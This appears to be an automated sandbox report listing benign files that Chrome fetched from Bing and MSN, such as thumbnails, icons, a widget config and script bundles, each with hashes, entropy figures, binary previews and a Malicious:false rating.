                                                                                                                                                                                                                                                                        SHA-512:2CA74D5484665526480AF69E55220436CFA7E47DAA210369890002785C466F322F40AEC9433173122D48C0B89B95F3A42CBFE762769B87C8F6E67CE0755549DE
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....4..].{S......c.Pe/+.......G.....&5.Q.:8..W....y".q..6Ryf..E.@.....g....2+C......RU..g.4..m[xXv.4G.*.DC.Se.*.})|...|....pD6.).....Er......J..p......9..*..E....kL...W.#.O..m...=H.4?C~/.............h.5.|`......,....Us_..........,...f......P...I.jhR:.v.5..B..L...J...R.E.J...J...cI.szT..0)..-.FN.EM...A5|.A.@i>l....".((..L.qi...Z.....p.:....X.3Tw5L....f.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4629
                                                                                                                                                                                                                                                                        Entropy (8bit):7.907676403428206
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgE3vee2ccPCMR79u4pZmlE8zPcsJL/0K80tkpbMDZBLkJ0O:ygHnccnR7PpoEm9R0Ge0BLI
                                                                                                                                                                                                                                                                        MD5:5F05C6E3B26A5182C1FBF8ED56683D0D
                                                                                                                                                                                                                                                                        SHA1:7754D6FD6DB3F7B056DF3E57A43E781FEDF78F20
                                                                                                                                                                                                                                                                        SHA-256:092E3C16140DAC45F765C3D291DE251755406063E784A35295343C75C0E49DCB
                                                                                                                                                                                                                                                                        SHA-512:83C24803C1BBDD75A3618415B758AE09B340327AD05305D836F5189B7552FAB90B12A981E703C543381FC7FA483975282E448D63F95BF1698DDC5B0C2B313C31
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......*..{.K...&.....r6....K....1S...wVF..k...&.xu.....X....J.x.]q.<=......g.S......=.c.........%.......#P7.<E...@.......U.pxWN.pm...y2J.O.Z}...{."/..?.$..A.V.g.A..m*.0;....R%..p.......}.$..@.-..p.rK...8.j..6..c....2^..Q.~.....[v..E >...Gn...#w.P..^.g4.nH..S.&d..U".....>o....j\..<..O........>?.m[i.eM..5......K... .}3.{\:.....p..&.i?..[y...$......K.R......?.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (423), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):423
                                                                                                                                                                                                                                                                        Entropy (8bit):5.117319003552808
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:2gSYjthM4GF4aaXtdhI9DfaUZnsMQYAQI:2gSW/bS9/ZnsMAj
                                                                                                                                                                                                                                                                        MD5:3A5049DB26AF9CE03DB6A53D3541082D
                                                                                                                                                                                                                                                                        SHA1:934DAEA4EDDE2568CA02AB89AF23FDCFEB57339A
                                                                                                                                                                                                                                                                        SHA-256:AF8C36DEFED55D79106513865F69933E546E1E4C361E41C29F65905DED009047
                                                                                                                                                                                                                                                                        SHA-512:5E21B6E184CBB0013DCCE174345DAC14BB64D391CCA3B253F73C7373253FDCA5E0BB297A0BD2FAD237E4F796895807660369680621C49C8F99DF428ED3218C9E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:(function(n){function i(){var e,o,u,s,f,r;if(document.querySelector&&document.querySelectorAll){e=[];o=n.rules;for(u in o)for(s=o[u],u+=!s[2]?"":" >*",f=document.querySelectorAll(u),r=0;r<f.length;r++){var i=f[r],h=0,c=0,l=i.offsetWidth,a=i.offsetHeight;do h+=i.offsetLeft,c+=i.offsetTop;while(i=i.offsetParent);e.push({_e:f[r],x:h,y:c,w:l,h:a})}n.enqueue(t,e)}}var t="L";n.wireup(t,{load:null,compute:i,unload:null})})(BM)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):80377
                                                                                                                                                                                                                                                                        Entropy (8bit):5.044147290339786
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:1536:KlT4i0HdZuaRNuccj3q4Zz9THmcWcTZqhzbKyNw:YMdZuaRNuzutcWcdB
                                                                                                                                                                                                                                                                        MD5:B9A834AEDC811DA9EE6344632C850EC6
                                                                                                                                                                                                                                                                        SHA1:CEBAD948A2CCED6DAC3C676C3F8CE1CD59B649DF
                                                                                                                                                                                                                                                                        SHA-256:86A7A9E4632332D8419D54ABA9D2179E5484A724269DC6A0B3B5B5E63031E706
                                                                                                                                                                                                                                                                        SHA-512:A2217F8A68430FB4ED164AF50E1F41A675A2B4308BAA4E6CB4773AF8E60814C35CF4C6C4D0798C608988B3C0751B7AE83E1759AE3BCCBE5FE21BC87E672A3D24
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:{"configs":{"AppConfig/default":{"properties":{"rootExperience":{"configRef":{"experienceType":"Widgets","instanceSrc":"default"}}}},"Widgets/default":{"properties":{"dataConnectors":[{"screenWidth":"Any","children":[{"instanceId":"WeatherData","configRef":{"experienceType":"WeatherData","instanceSrc":"default"}},{"instanceId":"TopicData","configRef":{"experienceType":"TopicData","instanceSrc":"default"}}]}],"widgets":{"BingHomepageFeed":{"instanceId":"BingHomepageFeed","configRef":{"experienceType":"BingHomepageFeed","instanceSrc":"default"}},"EsportsCard":{"instanceId":"EsportsCard","configRef":{"experienceType":"EsportsCard","instanceSrc":"default"}},"SportsCardWC":{"instanceId":"SportsCardWC","configRef":{"experienceType":"SportsCardWC","instanceSrc":"default"}},"TrafficCardWC":{"instanceId":"TrafficCardWC","configRef":{"experienceType":"TrafficCardWC","instanceSrc":"default"}},"WeatherCardWC":{"instanceId":"WeatherCardWC","configRef":{"experienceType":"WeatherCardWC","instanceSrc"
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):409
                                                                                                                                                                                                                                                                        Entropy (8bit):6.974521018329099
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:6:6v/lhPf+nMR3y2p7BwgFljMFEMCNn5inVvVunXKF9lsfW53A5FA/ZaUznTlO6lqQ:6v/7unM3lyuFVNNna4XABu5o/16Qp
                                                                                                                                                                                                                                                                        MD5:80969A6D700E813EF741D172674FEADD
                                                                                                                                                                                                                                                                        SHA1:361263C136CD857BA53FD7743C971BB7527BF12E
                                                                                                                                                                                                                                                                        SHA-256:0775687711D232F4C891F22CBC4040464E160C09044DEAA12C98BFBAB9C79CD6
                                                                                                                                                                                                                                                                        SHA-512:424891BE46A924B3DD222B39DEB740A54DED4C20818C5B4AF80E2BCF3B671260AA9E910C2D6F9FB48700D6E8DB370E0F0B52842499B7C885934108ABFEBCD4A2
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://bing.com/th?id=OBFB.A4BA5FAAD27A6328F8FF1BBC72391AE2&pid=Fb
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR.............(-.S....gAMA......a.....sRGB........{PLTEGpL.............\...........\..a. ...W....!.. h..t. ..................m.....{..t.!...f. ......R.....\. .........a.<..........H.....tRNS... ..=....... ..........IDAT..E.[.. .@.`D.k.ZA..j...&j...C`..(...R..Q!......4hVC%.#......d..xR/....(WA.....a..1r.a...v...X....F.]..]g.P....m[....}..<AZ.....!F/...1..^.Wj..K.}.....]......L....IEND.B`.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):1324
                                                                                                                                                                                                                                                                        Entropy (8bit):4.7183372945791175
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7exe9QVsVsyPXSF/yC9H9eAWw0uac+5SsciTpvFwf8abKP3LRkP06yfor/y1J:aYsOyPCFBPHac+Esc0w0abeL+PhyQw
                                                                                                                                                                                                                                                                        MD5:01F55EF8E6EE276794A2FA5712D40347
                                                                                                                                                                                                                                                                        SHA1:0B6B137463DC897215ECAA2810C793AF4DADC1AF
                                                                                                                                                                                                                                                                        SHA-256:AC394B126F99224EF9FD7B9A98C02FA22E41146B2534CA789BF7567C528BB322
                                                                                                                                                                                                                                                                        SHA-512:7253EAA00E10BEDD6B9E41FDB826F241ACFA7F0CC11BFB0B775B9E99104373388B07EAE0525B2023FC796FEF02A8CD63E929DFACC3AC4B052D061CF2B5E99B97
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15spNo.img?w=16&h=16&q=100&m=6&f=png&u=t
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+.....XIDATx.mS.K.a.=...A"aKJ....P........4. TC. .6....NB.S....... ..W......{.KOJ]...}.=.{.y$...~..p...7.Q.T.........M&....xyy..k.Z....obbb......!...XQ.VC.P@.....5&''......hV(.........T.f....."'...>.........O.L&X,.P.......!.Jquu...#(.J....R..\.....1==.E'''....*:...>??38!....V..l6!.H......G.q}}.....D...+........A..!..1#.L.....}.........._......`....F.e>..g.....`~~^.......P....(.=X.V.B...7.........gggH..h.Z\LN...E$...G.....z.4;Y8....t.\.s..`..h.F..^...F..\...5..A..U,.Q.T`...d@k.o.....8...f....v..~.Z....R.....&..,{@..cgg.....)...dYz4$...9.yaa................. @...nll.v...yF.11#.^...$H..f.......J...7{.....IEND.B`...................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4427
                                                                                                                                                                                                                                                                        Entropy (8bit):7.901507439306134
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:8zgEjUeLMQJWy9jI9yCSNJCwTonVpKvAZL5nV0OxNv1vqOHnX3NldpoX/U:ygGUAMQJWCjmyfMp2AZr0OxNIOHHDWs
                                                                                                                                                                                                                                                                        MD5:21ED0B5BC830C52C09FD4886FC61A39F
                                                                                                                                                                                                                                                                        SHA1:B009FE7BEDA5DDA14347CFB59D0AB9761D2ED5A2
                                                                                                                                                                                                                                                                        SHA-256:676B94ACE0ED2F1931EA66D82F8CD8826476DCA0177DA042B80DC1655213FFDA
                                                                                                                                                                                                                                                                        SHA-512:7C220A9BDEBD90926B62121FAC2D3BC36F68757A0666EF1BF9D8F4A0084C85AB6651E6B4294C957030F592A5307512ED66A02FBCB857685FCD143D30A4EB05C9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_pu4Sh615T_Ss0HuDxz5lbg&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...(..E.R...)r(...(..U..P.bp..h...Z...I.0Tf.....S)Y\.E.J+.........Y.~......W...0<........Sn...Y^".c...u%..i....*N[...F....l...q......ko.V.m...."..pH...J..w'us.y[C....4.....L.W.x...Zh..&.....Ri..!i(...(...(...(.I..?..@.QGJ(.....}...u_V.f......M....*[{yn..........&.t..WA..V......O8s....?.A.k..x#.#<..E.....&......5.Mb..J....h..6.ply..E.T..?/...n8.j.{O..7e..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):2840
                                                                                                                                                                                                                                                                        Entropy (8bit):7.835077120860834
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAFQ7pN2dSc/8dih2PC5EyaD7BVTFs9NVha9h8Dvy7Q:8zgEWWG26KXyNDa9Ya7Q
                                                                                                                                                                                                                                                                        MD5:D353FF199EB6DD91069BFDE6FA143308
                                                                                                                                                                                                                                                                        SHA1:581043D7A6DE039A9CF6B2F7F0C5D8C0A809BC9E
                                                                                                                                                                                                                                                                        SHA-256:B6AC5508D401154E3199EEB86B068D48A5983A0481571589D0321F22C4622338
                                                                                                                                                                                                                                                                        SHA-512:49784492F7267080478A5717974CCF22B557CDFC59EDFA21E9CA9C63B52E7995A933D3C95F6FF7F238A509376FB8A65AA72F0089C22E552D107846216835AC77
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?....J*........4...`.rk......./.g../.<.<.JF....2...u.'...(...?.{a<.T.c...R.f`.d..SCW.._.\}.m....c.\:.4.FJ..@.z..k&..3.rvGI.x.H..y........._...W7q......O..{....T~....m..`V......;...*....:.........+.....$..W].j.z................TV...T..OZ..j..z...9?vH..eO..{..j..L.Y]..M&j.....c...d2...=A..<.S.Q.yW.C..M..\b....s.t..[....1.......XV.2..r..gJ.Q.h1.Ke..4...
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):24303
                                                                                                                                                                                                                                                                        Entropy (8bit):7.96423252705246
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:e4hunDxDPOozcisb98hd73c0YzmO5h/XbFMFP2f6ELrtdIM4KjA6GXwQF7qmQkGU:eGunhPjAisu7c5h/XbF4+yEHn34KjA6u
                                                                                                                                                                                                                                                                        MD5:9BE11D075B63C514FFC7CA3120DB5AF5
                                                                                                                                                                                                                                                                        SHA1:6607C84808FFEC7B5E79E02BCFB64C84E3A53509
                                                                                                                                                                                                                                                                        SHA-256:C7BDC34921658FDF0D33964673A468BAAF6D64B1BCC8A37276A08ABA25884DE5
                                                                                                                                                                                                                                                                        SHA-512:07EF79D76F509D4A833D90D15998E10CA27B2BA978CACDE5CADF0A5C9B8C1E7094A19BC5FD48E77F2638F36BB6E0E2405D07BF31AD7CA7316E6C1810C96277A4
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://th.bing.com/th?id=ORMS.7be17d87d8d20d39c7cddb3d5f4a18e2&pid=Wdp&w=300&h=225&qlt=90&c=1&rs=1
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...W.:...wi.......c.....n<..^k.P.1?.{.....^$...\.oc..".g.?z.G....y&Y..)RU...+..'..+.:v...z..o--.4..5PCp\...k..i6....r..\..v.....Qr.<Mn..[.q.Qk;.X.....q..Ibp._...Z.5....RI.u.}.+.|2.4}'F.V...\...F.l.e....;...27....M.v..3..k.........j...[a%....D..d.!...Eb..]....s.[X.Zv..'X3.f..._..<.omm.,..=..H..D.bgc..T...u.7.2.._......~...^..e.4.v...4I$..J.GqR...sY..M..[3E.Sz
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):79879
                                                                                                                                                                                                                                                                        Entropy (8bit):5.414521996940323
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:768:jK/QNwRLX5/UaZEO1AKjVP3ovcIHQHHawwOAbyEJsgOItohk6QcCCDZp3C+Btf7t:9EjsShtvhA35NtKsSjhjCXSFz2O
                                                                                                                                                                                                                                                                        MD5:A5C775DB71DD35A3564221019D2CAA46
                                                                                                                                                                                                                                                                        SHA1:6A90A4B69A0333304C1BE4A1C367C9E19F184371
                                                                                                                                                                                                                                                                        SHA-256:C7C6394A3B247F50C7E732114C1B3175813EBF488C94E0B0B00842522E0113B1
                                                                                                                                                                                                                                                                        SHA-512:E36444A9C60F5AE34CF0D1EE02C531890EDE0EE7A6EDADAF9F249B7317FB2EEB98390AB2B937EEE7D130EA5F3A46692A1A5BE045ABA77E7401546194B0844E06
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://assets.msn.com/bundles/v1/bingHomepage/latest/libs_social-data-service_dist_adapter_SocialServiceAdapter_js-node_modules_fluentui_svg-icons-3b5f35.ec9a47c2a9b9c26c7f39.js
                                                                                                                                                                                                                                                                        Preview:(self.webpackChunk_msnews_msnews_experiences=self.webpackChunk_msnews_msnews_experiences||[]).push([["libs_social-data-service_dist_adapter_SocialServiceAdapter_js-node_modules_fluentui_svg-icons-3b5f35","msnews/publishers-service-client"],{55128:function(e,t,i){"use strict";var n;i.d(t,{S:function(){return n},PublisherServiceClient:function(){return b}}),function(e){e.More="More",e.Mute="Mute",e.Read="Read"}(n||(n={}));var o=i(33940),r=i(56692),s=i(45506),a=i(76754),c=i(63535),d=i(5696),l=i(61442),u=i(17157),m=i(59207),p=i(11380),g=i(81866),v=i(51125),h=i(12108),y=i(33799),f=i(51671);class b{constructor(e,t=!0){this.fetchImpl=e,this.addPageInfoToOcid=t,this.followedPublishersEndpoint="v1/News/Users/Me/PreferredProviders",this.followedSourcesEndpoint="msn/sources",this.publishersServiceEndpoint="Msn/Providers",this.actionsServiceEndpoint="Graph/Actions",this.followActionSourceEndpoint="community/follows",this.ocid="feeds"}getOcid(){return this.ocid}getUserMutedPublishers(){return(0,o.m
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):14338
                                                                                                                                                                                                                                                                        Entropy (8bit):7.950768400583616
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eP7O+T1mPPYlc2bKTC1rh5riJXtEqExMO1hV4tcEFWY:eP7NcPP8PbKC11J09Eqk9hFEoY
                                                                                                                                                                                                                                                                        MD5:DB582ACCFCDE17455AB1747A4C7938D2
                                                                                                                                                                                                                                                                        SHA1:39CAC96990135A6635BF6C9428DDDB84E02C986A
                                                                                                                                                                                                                                                                        SHA-256:ED76BCE76C0F1204121B66D32929330A373749E29F3A31232826A4F4FE795259
                                                                                                                                                                                                                                                                        SHA-512:9A63A4D854FCD297369C636EDFEE93835DCAFF9D6F0915D87F0D7FC731B06C37734418FDF7CCF7E635D546565CF07F47FA7FE4CA1F99B00089C5C128C4B37111
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..j5.Y.<..f.-.s.H.E..Z..+..M_..m.U.[Nz~......*8m6<.........V!...C...N..>. ..O.r..1R....b4#..#.Z.1.X.*EO.....@.K.iSb...R.....b....E..l...jAE+..G........c..G..8..>o.....ak...c:.{..+...:N+s........6L.......#c.....^\.'.>...uK..H2p....c5.a0..^[.<..O..S_....M.=.M.......".uB...ha...2.U.1.[e....L.".....H..l..m....z.HA..'.E*T..5lc.o.T.....W.....Q;)..9..Bj.....{e#
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 186x88, components 3
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4402
                                                                                                                                                                                                                                                                        Entropy (8bit):7.886154808744179
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:8/bxnuERAxkILDk91RZ3ttXoMTF685436Nl1alqYesUf8q8YK0MaI1+qFoSEBfrm:8zgEYg917vTFBalqYeB8zB1GSEhmIU
                                                                                                                                                                                                                                                                        MD5:B9F2ED6B7A89EC13B725AD6C6F1824C0
                                                                                                                                                                                                                                                                        SHA1:151E9E232DF6551D68D1299C7D8221D3EFD02A4F
                                                                                                                                                                                                                                                                        SHA-256:A3F6BD882A0A8F4F62E7F2D87C65AC084D154BAF6146D851A8B73C2F26A8C780
                                                                                                                                                                                                                                                                        SHA-512:82D1F20EBB416CB9BD9DDE3670EB959C547A8996B8FA0067BCCCC3BBA341FB5539EB85E84F166553DE58BDD72B6F20AA8987E6AEAE6056A146C603DE0BE579D6
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        URL:https://www.bing.com/th?id=OPN.RTNews_KLvkMPKzkUnle2TPzLc77Q&w=186&h=88&c=7&rs=2&qlt=80&pid=PopNow
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C.....................................'!..%..."."%()+,+. /3/*2'*+*...C...........*...**************************************************......X...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....c.<.../.l...M.'.Q}..{&_..e.~.....i.E..6.G$.t....;..ZG.,....n..,..J.......?.yw=\D.x........./G.....{.G.s.;.G.....-x.:*. #..u#..^#{...e.M..v..G...Um....0vzW.x...P..K........n...x.>.x.U.....0."x.{..5(..r>l...@.Os.f.].^...T..m..t..*.l...5......u.K...<d.q?.o.....@v...3......7g.{V....]../..DY...d..... .kA.x.$..~u,.u.`...z.[....._..l#.......?..D......o>.?Z.
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1240
                                                                                                                                                                                                                                                                        Entropy (8bit):4.696555314984949
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:6v/7/JxwTBjVaqbvkqFvgBV6ilS8DBMSfrVAd1yACHuMy8s:4JGl1b8qFvgBoivTVAyAM
                                                                                                                                                                                                                                                                        MD5:87A9C15B6574AAFB2D82C36329355FE0
                                                                                                                                                                                                                                                                        SHA1:78B72F92FC453BD5237996AE455CCF5F3E0F30CC
                                                                                                                                                                                                                                                                        SHA-256:F9D8BD135C9B46CE8C30B30720E7B6A86BABF2005CC71388A68AB571224530EC
                                                                                                                                                                                                                                                                        SHA-512:3369BDC076917C0BF4578B5C9FFC92BF24F7B8A8832FC8A1AF6989ADE72E27B3F99583BEFACFABE9799AAC2BBA94E172B5960A3094AF8CC48AD1A3E7569D9E4E
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................a....pHYs..........+......IDATx...?H.Q...R&..9..EW.....!-..".....*.m"..........$H......(>m. ~....s.....;p.....s.=.^.z...@...#.x....S.......@....7.M.R....j...d..v..l...."......P.Tl.z=.....`0.F....>(...\..X,..v....d2!......z..'''(.J0...h.Z[...)G..d.x}}....#.. ..........a&.A0......P...`..9*....<.......::........ppp.............0..@.&.N.lK.R<>>b4.A"....$T+...!*...N'G..T*y...;..4...P(..Q.P.^.V.S..V...n.GGGlS...!(.I..g=..1.L.^,......h...E.\....j...9.....www\..G...|\dn#..Z...A..."Q.j....b..X,.....k..Eg...<I...$t......*^^^..F?.I....J....Y\]]a>......!......$.........~.L,...L..Y{c....IEND.B`.............................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 300x225, components 3
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):16805
                                                                                                                                                                                                                                                                        Entropy (8bit):7.96652595342381
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:384:eO78M4HdOWkPItioxSE8axWB9RznBYId/AzqNWpKtM6QHfK:eOhzIMoxSEd+9Y4/SqeK66p
                                                                                                                                                                                                                                                                        MD5:30085D1F40ACD483B2CA93C4EA164E53
                                                                                                                                                                                                                                                                        SHA1:DFD08585B733A0D719CDB83EED9C99BA3E787EF5
                                                                                                                                                                                                                                                                        SHA-256:36FCE38700B44FC77613A39F3DC54B7FFFA9A28B26517CF16B967968022F88D2
                                                                                                                                                                                                                                                                        SHA-512:8EECC9F98933D2EA51E42A165717E4E60359A977156D4E334EECAE615724DA32909C59B74D62F6A52638198E5094F0E1F8C5A782288BF18488C19AEA5494F28C
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                        Preview:......JFIF.....`.`.....C....................................................................C.........................................................................,.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....6p}q.&`3..b..'..Ozlj.A.Z....B........D..I..sRZ..Nq..vV,x..(}H.*[$}9...`u..U.bLc..V.A. g..[...6.D..``..Q.u.=.:2.j.<.....<.7d....._C.`...1W,[j..*..j....P.2O..?.Cx7.].;..jl...'4.W.q......b....p.e......9.[<t5...)....k...P...7..S...G..?.4..^.ZL..V.+....(..N:z{..V.vL.f.s.6...Q.A...]....x....(.{.e.s..e.S........[Sc.<..g.o..y.3.....4y...]..+d..?{.y.x..'.nk
